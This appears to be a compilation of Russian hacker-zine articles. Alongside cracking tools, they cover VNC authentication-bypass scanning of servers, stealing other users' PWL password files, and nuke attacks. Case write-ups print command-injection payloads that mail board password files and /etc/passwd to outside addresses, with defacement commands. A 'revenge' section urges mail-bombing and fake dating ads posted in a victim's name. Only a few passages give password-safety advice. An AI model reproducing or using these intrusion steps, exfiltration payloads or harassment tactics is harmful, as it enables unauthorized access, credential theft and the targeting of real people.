Третий тип инструментов взлома - нет, не фомки и не лом. Отладчики. Наверняка все, кто хоть как-то знаком с хаком (хотя бы и понаслышке), знают об их существовании и о том, как сильно они помогают кракерам в их тяжелой работе. Они есть под все платформы и операционные системы. Изначально они были призваны облегчить жизнь обычным кодерам-программистам. Но потом стали появляться кодеры, которые использовали отладчики не только на своих программах, но и на программах коллег по работе/учебе. Ведь всегда интересно, что же там эти ламеры наваяли? А некоторые считают, что гораздо круче поковыряться в уже откомпиленном ехе-шнике и сделать такое у себя, подкрутив там и подправив здесь, чем корпеть над этим самому. Хотя я с ними не согласен. Ладно - вернемся к нашим баранам, то есть отладчикам. Самым известным `фирменным` отладчиком был и остается Soft-Ice by NuMega Corp. Его реализации есть как для DOS, так и для Windows 9x/NT. При этом он дружит практически со всеми extender`ами вроде EMM386 и QEMM. Установить его, научиться пользоваться им и всеми его крутыми фичами - немалый шаг к успеху в нашем скромном предприятии, как сказал бы AtH. Очень мощное средство. Собственно говоря, именно его я использую для взлома всех программ для Windows и почти всех для DOS. Однако кроме него есть еще довольно много очень приятных в использовании трасеров-дебагеров, как их называют некоторые кракеры. Например, очень даже неплох DeGlucker. Сделан он ручками Gorokhov и... после того, как они его бросили, им занялся CrazyMax. Правда, у него есть некоторые минусы (например, необходимо загружать операционку без extender`ов, потому что DG работает только в V86 режиме и ни в каком другом), да и свежую версию, свободную от глюков, мы не дождемся - авторы его бросили. Правда, перед окончательным `хэппи-эндом` проекта CrazyMax выставил на всеобщее обозрение его сорцы (исходники, стало быть). И есть надежда, что найдутся пиплы с большим количеством свободного времени, ума и пивы - довести это дело до ума. Говоря о дебагерах в приложении к хаку, я почти ничего не могу сказать о таких вещах, как Turbo Debugger фирмы Borland и CodeView от `Мелкомягких товарищей партии`. Эти отладчики помогут отладить базу данных для родного предприятия в случае, если имеются исходники к ней, но никак не помогут понять устройство какой-нибудь библиотеки хитрой программы с клевым предложением `REGISTER!` в меню. Хотя я, например, использую Turbo Debugger, чтобы отлаживать вирии. Еще не могу обойти вниманием такой отладчик, как AXE-Hack. В отличие от DG (обладая более расширенными свойствами и сервис-фичами), он позволяет работать прямо в окне DOS под Windows и эмулирует (то есть дает программе подумать, что он что-то делает, а на самом деле - филонит по страшному) часть команд процессора, что иногда становится серьезным подспорьем в борьбе с какой-нибудь супер-пупер заSHITой. Вообще, не фирменных дебагеров довольно много. Но рассказывать обо всех не имеет смысла. Для хака вполне хватит и тех, о которых я уже рассказал.

Дизассемблеры

В некоторых случаях одними отладчиками не обойтись. И тогда на арену выходят дизассемблеры. Но и здесь есть свои подводные камни. Такие дизассемблеры, как Sourcer, например, просто декодируют команды и выискивают ссылки на уже определенные участки кода. Немного изобретательности - и Sourcer выдаст на-гора километры ненужных file.lst, содержащих полностью перечисленные байты файла, но ни строчки по существу. И все - больше он практически ни на что не способен. Зато с его помощью можно получить вполне приятный дамп BIOS. А ещё компактом, на котором этот дизазм записан, можно в кого-нибудь кинуть. Иными словами, ему применение почти всегда найдется.

Другое дело (в хорошем смысле этого слова) IDA - Interactive Disassembler by Ilfak Guilfanov. Автор этого чудесного дизассемблера сделал упор на работу, прежде всего на взаимодействие с пользователем (или, по-нашему, хакером). IDA не выдает текстовый файлик мегабайт этак на 20, в отличие от Sourcer`а.

Нет - IDA есть приятное междумордие (interface) для юзверя и позволяет просматривать и помечать просмотренные участки кода именами/кличками, чтобы их потом можно было легко найти. Плюс возможность писать комментарии везде, где только это радует глаз! И возможность писать свои процедуры анализа на встроенном макроязыке! Такой подход позволяет исследователю восполнить все пробелы `тупой железячки`. И это далеко не все возможности. Дело в том, что IDA поставляется вместе с набором специальных плагинов - для автоматического распознавания. Например, есть программа, написанная на Borland C++ 5.0. Если IDA определит (а она определит, то есть не если - когда), что эта прога скомпилена именно на BC, он подгрузит соответствующий плагин и сможет распознать и обозначать стандартные функции (например, exit и biosdisk на экране будут не просто асмовым листингом, а именно exit и biosdisk), что уменьшает время, необходимое для поиска `лишнего` кода. В общем, IDA намного опередила всех своих коллег по жанру. Очень рекомендую.

INT-Мониторы

INT-Монитор - программа для отслеживания и записи всех (или только указанных) прерываний, вызываемых подопытной программой. Для DOS это - INTController и INTIndicator by Maxim Chirkov. Это небольшие резиденты, которые висят на нужных прерываниях и следят за частотой их вызова. А для win32 существует прекрасная вещь - APISPY32 by Yariv Kaplan. Правда, чтобы `шпиён` ловил вызовы какой-нибудь апишной функции, ему необходимо в специальном файле прописать имя этой функции и тип ее аргументов - несколько утомительно, и если используются функции из собственных библиотек, поставляемых вместе с программой, - ничего уже не сделаешь. Но это единственный известный мне вариант подобной утилиты под win32. Пригодится.

Анпакеры-распаковщики (unpackers)

Предназначены для снятия так называемых `навесных` защит. Например, есть уже готовая программа, и лень лезть и встраивать защиту. Или хочется, чтобы она занимала меньше места на диске. Тогда берется программа пакер-паковщик (packer), и `натравливается` на бедный

ехе-шник. Паковщик упаковывает код проги и пишет свой распаковщик в начало, а потом дописывает все остальное в конец. Когда программа вызывается, то сначала отработает распаковщик, затем уже будет выполняться запакованная программа. В результате, такую программу невозможно пропатчить, не распаковывая, так как нужные байты, как правило, запакованы-шифрованы, и найти их не удается. Но можно распаковать весь файл и исследовать/патчить его отдельно. А потом при желании запаковать (тем же или другим паковщиком - для экономии availspace на hdd). Для тех, кто на бронепоезде - именно этим (распаковкой) и занимаются унпакеры. Существуют унпакеры как универсальные (CUP386[DOS], ProcDump[WIN] - лучшие из них, на мой взгляд), так и `заточенные` под конкретный паковщик. Из вторых могу посоветовать Universal Unpacker Package by Predator 666 - сборник унпакеров для самых популярных пакеров + универсальный унпакер. Из первых - все же лучше CUP386; единственное, что придется делать самому - так это мучительно вспоминать, `куда же он делся? после вчерашнего...`, а остальное он сделает сам (если найдешь, конечно). Для Win32 лидером пока что остается ProcDump. Это по совместительству унпакер и дампер. Есть хорошие фичи, вроде примитивных скриптов, на которых можно описать принцип действий унпакера для конкретного паковщика.

Вродетогопослесловиеиливродетого

Вот такое вот оно - хакерское дело. И софта в нем занято немерено, и юзать его ещё научиться надо. Но ты - ты научишься обязательно. Как говорится, у страха глаза велики, зато енг маленький. Только начнешь - всё получится и всё будет в порядке. Ах да! Где софт взять? Чуть ни забыл. Почти все, о чем здесь шла речь, можно слить (или найти ссылку, а потом слить) с http://i.am/wwh, http://dore.on.ru, http://www.idapro.com, www.internals.com.

Ну всё, дерзай, а то пиво стынет. Удачи. Как знать, может ты - потенциальный избранный? Время покажет



Как крадут пароли
Самый популярный среди пользователей нашей почтовый системы способ основан его изобретателями на желании одного пользователя обмануть другого пользователя. Злоумышленник заводит себе почтовый ящик на mail.ru с адресом, похожим на служебный: pass_robot_support@mail.ru и т.д. или любой другой. Далее злоумышленник рассылает письмо тем, пароль от чьих почтовых ящиков он хочет получить, либо создает страничку и рассылает ссылку на нее. Текст письма или странички всегда разный, но смысл такой: в Mail.Ru дыра, отправьте на адрес pass_robot_support@mail.ru (адрес может быть совершенно любым, главное - похожим на служебный) имя Вашего почтового ящика, пароль к нему, а также имя чужого почтового ящика, от которого Вы хотите получить пароль, тогда в ответ на такой запрос Вы получите пароль от интересующего Вас почтового ящика. Этот трюк рассчитан на тех, кто хочет получить пароль от чужого почтового ящика и настолько доверчив, чтобы пропустить мимо самое главное: что на адрес злоумышленника (в нашем примере это pass_robot_support@mail.ru) человек собственными руками отправляет пароль от своего почтового ящика!!! Таким образом, неудавшийся "хакер" после отправки такого письма псевдо-роботу может попрощаться со своим почтовым ящиком.

Ещё вариант - все данные о владельце почтового ящика можно легко узнать из данных по ICQ. Поэтому рекомендуем Вам либо не вводить данные о себе в ICQ, либо вводить в ICQ почтовый ящик, данные в котором не будут совпадать с данными в ICQ.

В Интернете применяются несколько способов ограничения доступа к конфиденциальной информации. Самый распространенный из них - парольная защита. И действительно, вспомните, сколько у вас паролей. Первый - для доступа в Интернет, второй - от почтового ящика, третий - от ICQ. И это только минимальный набор. Практически любой сервис в Сети (интернет-магазины, электронные платежные системы, простые форумы и т.д.) требует от пользователя регистрации. И утеря любого из этих паролей грозит интернетчику немалыми неприятностями - от воровства денег со счета провайдера до вирусов, разосланных от его имени его же друзьям.

Думаю, вы сами понимаете, насколько важно сохранение пароля в тайне. И насколько лакомый кусочек представляет собой эта последовательность символов для самых различных злоумышленников. Мошенники разработали немало способов получения паролей у пользователей, но широкое распространение получили только три из них. Первый способ - самый простой. Я говорю об обычном подсматривании. Да-да, что может быть проще, чем встать тихонько за плечом пользователя и посмотреть, какие именно клавиши он нажимает? А потом, оставшись в одиночестве, злоумышленник легко получает доступ к желанной информации. Вот только такой способ получения паролей годиться только тогда, когда пользователь и мошенник находятся в одном помещении - например, являются сослуживцами. И многие люди зря недооценивают такую опасность. Лучше помнить, что пароль и информация, им закрытая, могут интересовать многих и стоить определенных денег, так что в этом деле лучше не верить никому.

Следующий способ получения пароля - это использование специальных программ, которые могут попадать на компьютер пользователя различными путями. Первое, что приходит на ум - это троянские кони. Чаще всего они попадают на компьютер по электронной почте в качестве вложений. Неосторожный пользователь запускает эту программу и... файл pwl (файл в Windows, содержащий пароли) отправляется к злоумышленнику, который, воспользовавшись специальной утилитой, узнает все необходимое. Но электронная почта - далеко не единственный способ получения трояна. Довольно часто различные вредоносные программы содержит софт, взятый из ненадежных источников - с различных домашних страничек, сайтов с бесплатным ПО и т.п. В принципе, защититься от троянских коней не так уж и сложно. Во-первых, достаточно соблюдать элементарные меры осторожности и не запускать программы, полученные по электронной почте или загруженные из подозрительных источников. Кроме того, очень хорошо защищают от троянов антивирусные программы. Вот только не стоит забывать обновлять их базы, иначе защита может оказать всего лишь видимостью.

Правда, есть еще один класс ПО для воровства паролей, от которых не может защитить ни один антивирус. Я говорю о клавиатурных "грабберах" - программах, постоянно находящихся в оперативной памяти и записывающих все клавиши, на которые нажимает пользователь. И хотя подобный софт не так уж и часто встречается, совсем сбрасывать его со счетов нельзя. Защититься от "грабберов" можно двумя способами: контролировать все программы, установленные на компьютере и выполняющиеся в данный момент, или использовать виртуальную клавиатуру, то есть клавиатуру, "нарисованную" на экране, клавиши которой нужно "нажимать" с помощью мышки.

Ну, а теперь осталось рассмотреть последний, третий способ воровства паролей. Речь идет о подборе ключевого слова. Применение этого способа основано на нежелании пользователей придумывать и запоминать сложные пароли. Люди стараются выбрать себе ключевое слово попроще и часто используют для этого личные данные - фамилию, имя, номер телефона или паспорта, имена родственников, клички домашних животных и т.п. Кроме того, совсем уж ленивые в качестве пароля используют строки типа "qwerty", "zzzzz", "1111" и т.п. с небольшими вариациями. Именно это и позволяет злоумышленникам так легко подбирать ключевые слова. Кстати, сам процесс подбора уже давно оптимизирован и автоматизирован. Теперь взломщики используют специальные программы, которые не только тупо перебирают все возможные варианты пароля, исходя из его заданной длины и диапазона доступных символов, а для начала просят ввести всю известную информацию о жертве вплоть до имени его любимого кота, из которой потом и составляют вероятные ключи. Кроме того, подобный софт снабжен специальными словарями, содержащими самые распространенные пароли. Словари эти постоянно пополняются, так что использовать простые ключевые слова просто бессмысленно. Наиболее продвинутое ПО для подбора паролей даже "умеет" заменять похожие символы. Например, многие люди используют собственные имена, заменяя в них букву "о" на цифру "0". Теперь эта уловка тоже не спасает.

Вот видите, насколько важно соблюдать осторожность при использовании парольной защиты. Нужно правильно подобрать ключевое слово (а это настоящее искусство и тема для отдельного разговора), соблюдать известную осторожность и не доверять никому. Только при соблюдении этих условий вы можете чувствовать себя в относительной безопасности. Но только до тех пор, пока ваша информация не содержит коммерческих тайн и т.п., потому что в этом случае вам придется подумать о гораздо более серьезной защите.






Как взломать дедик (выделенный сервер, dedicated server)
Способ №1

Прямые руки

Первое, что нам нужно - это прямые руки свежая или чуть пианайа голова =)
FreeCap - Предназначен для соксификации программ не умеющих работать с
прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
лучше цепочку . Здесь я небуду описывать принцип работы с этой программы
но вы знайте. что все действия я проделываю именно через нее...

Начнем.

Искать мы будем vnc-server т.е. Virtual Network Computing.
Первое что нам нужно это хороший VNC-сканер, я знаю 2 сканера:
это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
Свой выбор я оставил за RealVNC Bypass Authentication Scanner
т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачивакм данный сканер, распаковываем его к примеру: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер
где он нам выдаст следущую информацию:

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========

[+] Usage: VNC_bypauth
[-] :
___________________
|___-p____|___-i____|

[-] :
____________________
|___-cT___|___-vnc___|
[-] :
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|

[+] Type VNC_bypauth , or for more informations
[+] To increase the speed under linux, try ulimit -s unlimited

X:\>

Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляется файл VNC_bypauth.txt
куда сохраняются все результаты программы. Открываем и видим:

---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----

из результата видно что сканер понятным образом сохраняет результаты где бажные
сервера подписаны как VULNERABLE с такими мы и будем работать...
Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
позволяет подключится к бажному серверу, на подобии
Подключение к удаленному рабочему столу(mstsc.exe)

Способ №2

Ищем и качаем программу DSNS v. 1.0 очень хороший между прочим сканер
портов . Вбиваем диапазон, порт и ждем... =) через некоторое время сканер
выдает нам фуеву тучу открытых портов =). После окончания скана схораняем
данный диапазон Results\Export results одним диапазоном без портов.
Теперь настала очередь программы VNCMASS в которую мы вбиваем только что
насканеные диапазоны и давим Start All прочекает и автоматический подключится к бажным дедикакм... Фу-у-у-у... вроде всееее.... =)

Советую работать с сканерами через дедики т.к. вбили диапазон и пошли спать, а наутро подкл. и смотрим результаты.

(c) автор Te$t

продажа выделенных серверов (дедик)
осику => 21110001






Месть в интернете
Способы испортить жизнь своему недругу, пользуясь Internetом, хороши, прежде всего, легкостью и малым количеством затрачиваемых сил. Месть можно осуществить, что называется, не вставая с дивана. Однако не надо слишком уж полагаться на эту обманчивую легкость. Internet-месть имеет свою специфику, свои плюсы и минусы, и, если забыть о вторых, упиваясь исключительно первыми, то навредить можно в первую очередь себе самому. Давайте попробуем вкратце ознакомиться с различными способами мести через Internet, для удобства разделив их на несколько групп:

1.Грубые.
2.Пошлые.
3.Пролонгированного действия.
4.Изысканные.

Грубые

Сюда входят способы мести самые простые и одновременно самые ощутимые. При этом для того, чтобы подгадить неприятному вам персонажу, вам не придется даже использовать возможности World Wide Web. Как правило, будет вполне достаточно обычной электронной почты. Главное - узнать электронный адрес доставляющего вам неприятные эмоции персонажа. А вот что отправить по нему - это уже ваше дело. Хотите - посылайте письмо с вложенным файлом немереного объема. Хотите - отправляйте обычное поздравление с днем рождения, только раз по сто на дню. Особенно удачно, если у вашего недруга есть пейджер: пользуясь возможностью отправлять сообщения на пейджер через Internet и задав при отправке функцию повтора, вы доставите объекту вашей мести немало приятных минут.

Плюсы: простота исполнения в сочетании с ощутимостью ущерба. Применив способы мести из этой группы к вашему недругу, будьте спокойны: ваши Старания непременно будут замечены и оценены.

Минусы: если бы ты, дружок, был знатным хакером, то нужды в подобных способах мести не возникало бы: твои враги, имеющие доступ в Internet, и без этого старались бы тебя не задевать ни словом, ни взглядом. А если твои познания в компьютерной области далеки от всесторонних, то вычислить источник вредоносных действий для твоего врага не составит труда. И ответная месть, как водится, будет жестокой и кровавой. А так ли уж ты не дорожишь своим собственным пейджером и почтовым ящиком?..

Пошлые

Тоже несложны в исполнении. Нужно лишь разместить объявление о знакомстве от имени вашего недруга/недругини на досках объявлений для лиц той сексуальной ориентации, к которой недруг не имеет чести принадлежать. Ближайшие дни ему придется провести, объясняя свои сексуальные пристрастия людям, жаждущим знакомства, но принадлежащим к совершенно не интересующему его полу...
Плюсы: могут не вычислить. К тому же над подобной операцией можно посмеяться в компании, если, конечно, средний возраст участников компании не превышает 13 лет, а средний коэффициент интеллекта - 80 единиц.
Минусы: Полюбоваться на дело рук своих все равно не получится. А не отслеженная собственными глазами месть - это почти и не месть вовсе.

Пролонгированного действия

Способ особенно хорош для покинутых жен и любовниц - разместить от его имени объявление о знакомстве в правильном разделе. Потратив несколько месяцев на переписку с девушками, отсеивание тех, кто не в состоянии написать без ошибок слово длиннее трех букв, он, наконец, приступит к серии свиданий. Во время которых непременно обнаружит, что слова "красивая", "стройная", "умная" он и девушки понимают по-разному, а отсканировать собственную фотографию для юной леди не в пример сложнее, чем взять из Сети первую попавшуюся фотографию фотомодели и прицепить ее к письму о себе. Скорее всего, со временем он даже придет к выводу, что ты - лучшее, что он встретил на своем пути. Если же причиной расставания стало твое патологическое нежелание заниматься домашним хозяйством - то можно разместить на каком-нибудь сайте для домохозяек невинный вопрос от его имени. Например, о том, как приготовить борщ. С обратным адресом, разумеется. В ближайшие дни его почтовый ящик будет переполнен рекомендациями примерных кулинарок, а он наконец-то поймет, что от избытка хозяйственности тоже можно взвыть...
Плюсы: все по-честному.
Минусы: а вдруг он и вправду встретит свое нелегкое счастье? Ты же век себе этого не простишь!

Изысканные

Оплати своему недругу нелимитированный доступ в Internet на несколько месяцев вперед. Чем на больший срок тебя хватит, тем на большими срок твой недруг выпадет из жизни в виртуальное пространство. Пользуясь неожиданно свалившимся на нею счастьем, он забудет о родных, друзьях и работе. В конце концов друзья от него отвернутся, семья разбежится, с работы уволят... а когда оплаченный тобой доступ закончится, он за несколько дней исчахнет от горя. А разве не этого ты добиваешься?
Минусы: дорого.
Плюсы: все остальные.
Мстите на здоровье. Впрочем, помните, что месть разрушает в первую очередь мстящего.




Что такое NUKE (НЮК)
Nuke не нарушает состояние файловой системы и не рушит "железо" компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.

В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).

7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.

В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.

В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.

Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)



Взлом сервера на конкретном примере
Вдруг мне как 2-ое чуство говорит проверить папку CGI-BIN на доступность. Ну ввожу я http://www.kungfuklan.com/cgi-bin/, и что вы думаете ?:) Правильно! На этой папке был открыт доступ и можно посмотреть все скрипты :). Как раз за пару дней до этого на сайте группы DAMNED я прочитал о свеже найденной дырке в Ultimate Bulletin Board, данная доска и стояла у наших самураев :). Ozzman так же приметил это и не долго думая сохранил Sourse формы где был Replay и дописал в поле topic следующие:

topic='012345.ubb|mail ozzman@hacked.com
Но к сожалению пароли были в Shadow :(. Мы не стали огорчаться и поменяв строку на следующую:

topic='012345.ubb|cat Members/*|mail ozzman@hacked.com|'

получили пароли в открытом виде на всю доску! Но доски то мало :).

Начали исследовать дальше и сразу наткнулись на дирукторию _private и файл .htpasswd . Если кто не знает - здесь обычно лежат хеши паролей FrontPage. Так же и в директории _private лежит файл services.pwd и тоже с паролями:). Поставив john'а перебирать пароли мы отправились дальше по директориям. Не найдя в общем-то ничего полезного пошли спать. После 3-х дней, D@rk наконец-то расшифровал пароли но они были от FrontPage :(, один из паролей был kickMe :), мы решили попробовать его по FTP и ура, ура, ура, пароль подошел и сервер в наших руках!

Вот к чему приводит халатность… Админ (видать поленился придумать другой пароль для FTP, или забыть его побоялся :)). Просьба ко всем, если пароль еще не поменяли или не заделали дырку, не наносите никакого вреда данному серверу.

Вот так был взломан сайт клана Kungfu :). Спасибо группе DAMNED, за так сказать вовремя выложенную информацию.

www.w-three.net

В способе взлома этого сайта нет ничего нового и оригинального. Это скорее пример для ленивых администраторов и начинающих script kiddie, чем полезная информация для мало- мальски знающего хакера. В общем дырка заключалась в присутствии на сайте скрипта formmail.pl by Matt Wright версии 1.0 содержащего уязвимость позволяющую выполнять команды shell. Об этой уязвимости можно прочитать в cgi-bug на qwerty.nanko.ru, но я сам попробую описать принцип действия: для отправки почты скрипт использует следующую строку:

open (MAIL, "|$mailprog $FORM{'recipient'}")
где $FORM{'recipient'} поле recipient из
вызывающего html и $mailprog='/bin/sendmail'. знак "|" означает выполнение команды shell. т.е.
заменив на выполнится команду:
"/bin/sendmail; cat /etc/passwd | mail hacker@mail.com"

которая отправит файл с паролями на hacker@mail.com Вот в принципе и все что нужно знать для использования данной уязвимости. Теперь вернемся к взлому www.w-three.net. Мне повезло. Получив passwd я увидел там hash'ы паролей, а не "*" как при использовании shadow. Так как для данного сайта меня интересовал только deface и мне нужен был доступ для закачки файлов, то я выбрал всех пользователей у которых был доступ на ftp и скормил их john'у. Он сразу нашел пароль для пользователя gast - помогла буржуйская привычка ставить login=passwd. Во взломе помогло мне и то обстоятельство, что скрипт принадлежал и выполнялся с правами пользователя имеющего самый высокий доступ в системе(если не брать в расчет root'а). Я мог читать, изменять и создавать любые файлы которые принадлежали этому пользователю, а это были почти все файлы. Ну что ж, я имею все возможности для deface: доступ для закачки своего html и права на перезапись index.html лежащего на сайте. чем я и воспользовался:

mv
/usr/local/etc/httpd/htdocs/index.thml /usr/local/etc/httpd/htdocs/index1.html cp
/usr/local/etc/httpd/htdocs/gast/my.html /usr/local/etc/httpd/htdocs/index.html

Вот так "плохие" пароли, не правильное распределение прав и не обновленные скрипты могут способствовать захвату сайта.

sinobord.hypermart.net

Всё началось с того, что Lynx рассказал(а) мне о commander.pl (даёт возможность исполнения команд как на shell кому интересно сходите и почитайте на www.hack-crack.com )и я стал искать сайты с этим скриптом и нашёл. Этим сайтом был sinoboard.hypermart.net (хост www.hypermart.net), как не странно там выводился листинг директорий. На некоторые каталоги стоял пароль (я бы сказал на все в которых могло быть что либо интересное).

Использование commander'a дало не много файл паролей, который лежал в /etc был, как я понял от www.hypermart.net, но там меня ждало разочарование все пароли в * хе-хе… (обидно понимаешь), а master.passwd не был доступен. Но я не стал разочаровываться и начал исследовать все каталоги, на которые был доступ без пароля. Много чего там было и чат, и доска объявлений, и всякая другая всячина. Так- же там был и скрипт fileman.cgi по сути это файловый менеджер. На запуск этого скрипта пароль не стоял. Я стал смотреть содержимое каталогов через него, и какая же радость он не требовал пароля при открытии каталогов на которые стоял пароль. Пройдясь по каталогам ещё раз я нашёл то что мне было нужно, файлик service.pwd в _vti_pvt. Кстати этот менеджер давал возможность редактировать файлы так что я мог сразу записать новую запись в этот файл (наверное), но для начала я поставил файл на рассшифровку (там была всего одна учётная запись), и буквально через две минуты у меня на руках был пароль, он состоял из 4 цифр Для проверки зашёл по ftp всё работало.



Как лазить в Интернете бесплатно..
Собственно процедура взлома
Итак, представим, что ты пытаешься найти себе бесплатный доступ к сети
internet,
но не знаешь как это сделать?
Я приведу типовую схему взлома (или почти взлома) удаленной машины.
Что тебе для этого надо.
Надо немного:
1. Перво-наперво тебе нужен доступ в интернет (хотя бы на какое-то время)
итак, ты ходишь в институт пешком и покупаешь себе
несколько часов интернета.
2. Тебе нужно узнать ай пи (IP-адрес) своего или того провайдера, чьими
услугами
ты пользуешься или хотел пользоваться.
Для этого ты во время подключения к интернету должен узнать свой ай пи.
Просто во время соединения с интернетом тебе надо открыть сеанс MS-DOS
и в командной строке написать: winipcfg
Дальше нас буду интересовать только три первые цифры отделенные точками.
Запомни их или запиши.
3. Иди http://www.abb.aha.ru/software/nbtscan.htmlи слей эту
самую прогу nbtscan, слил - молодец. (желательно под дос)
4. Во время конекта грузи нортон или любую другую оболочку.
Дальше в командной строке пиши nbtscan.exe -t 50 xxx.xxx.xxx.0-255, где
xxx.xxx.xxx. - первые три числа, отделенные точками (то есть ай пи твоего
прова),
0-255 - количетво сканируемых машин, -t 50 - время сканирования, дави ентр
видишь всех юзерей, подключенных к провайдеру.
Взломать можно не всех, а лишь тех, кто с пометкой сервер (SERVER)
5. Процедура взлома
Ты нашел таких, у кого есть пометка сервер, дальше жми
пуск=>найти=>компьютер и пиши ай пи адрес этих юзеров
(примечание: если нет найти компьютер лезь в панель управления и меню "сеть"
добавляешь:
майкрософтовские протоколы tcp/ip ipx/spx служба доступа к фаилам и
принтерам сети майкрософт и клиент для сетей майкрософт).
Когда находишь юзера в поле "найти компьютер" ты буришься к нему на комп.
Пробурился - видишь доступ на диск "С" молодец, смело иди в папку
windows и копируй оттуда фаил систем.ини (sistem.ini).
В пункте passwordlist в систем ини смотри название pwl-фаила и имя юзера оно
пригодится позже. Копируи и сам пвл-ник. Все - акуант у тебя в кармане!
Все что осталось - это раскодировать pwl фаил. Есть уйма программ, делающих это
в 5 секунд!
(все же рекомендую PWLHACK)
Как защититься от подобного взлома? Рассказывать, думаю, излишне...
А вот как можно защититься от кражи паролей вообще.
1. Использовать последние версии ОС или программ.
Следить за выходом обновлений (patch) и тут же устанавливать их у себя.
2. Не сохраняйте свой пароль на жестком диске, не ленитесь набирать его.
Меняйте пароль как можно чаще.
3. Не использовать неизвестного происхождения программы.
Не открывать неизвестные файлы, пользоваться антивирусами.
И все равно никакая защита не даст вам стопроцентной гарантии безопасности
вашей информации.

ПРИМЕЧАНИЕ:
лучше всего вам подойдет провайдер без АОН-а (автоматического определителя
номера)
узнать, есть ли у провайдера АОН, не сложно. Вам надо позвонить ему голосом и
просто спросить:)
конечно спрашивайте примерно в таком плане:
"Здраствуйте, вас беспокоит ваш клинет, мистерХ. У меня возникли подозрения,
что я не единсвенный
хозяин своего пароля. Вы можете мне дать телефонные номера, с которых были
несанкционированные
подключениями"
На что вам отвечают "нет не можем, но для гарантии вы можете сменить свой
пароль"
Ну а вы, держа кукишь в кармане, просто извиняетесь и ложите трубку.
Ну а если вам все же отвечают "Да у нас это возможно", то вам не стоит
пользоваться услугами
этого провайдера...



Безопасность хакера.Прокси-серверы.
Теперь о главном. Посмотрим твой путь в Интернете. Комп-Сервер. Т.е. в этом случае палится твой ИП и время, потом через провайдера пробивается длина твоего… э… короче твоя личность. Рассмотрим другую схему Комп-Прокси-Сервер. Тут сервант палит ИП прокси, а он, в зависимости от его вида, решает сказать ли твой реальный ИП или нет.
Проще говоря, ты хапаешь порнуху на сам, а нагоняешь для этого прокси, который приносит тебе ее на блюдечке.
